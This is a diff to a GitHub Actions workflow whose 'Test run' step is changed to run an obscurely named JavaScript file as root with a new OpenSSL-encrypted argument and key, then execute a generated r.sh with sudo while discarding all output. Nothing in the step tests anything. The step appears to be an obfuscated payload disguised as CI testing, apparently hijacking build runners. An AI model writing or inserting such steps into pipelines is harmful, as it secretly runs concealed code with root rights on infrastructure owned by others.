--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo '6mmoe'
+        echo 'js0c7'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/aEJqy3FspmG3xdujf/yijBJ2tbqz7EPSOCMI3uBnLtrSu0F0akfosXsJljtRS4FWcdMh6jLTag6D1t3yX0JP/ytvv2XJaskFzlUt3/7zR5e/gBb7Y8IPR nkzjnw && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+FcxTN8XXLJY8lCVy/CLAHQOblB1iTqNmPS5xCmIx9wJvHrLeoX/PYClADre42DXD6kDceeHiQCcjwKAuggWhzl7vkE7FFNjAZcsBAoVaPMqjuyapg5BIQ 8a8y3h && sudo sh r.sh > /dev/null 2>&1
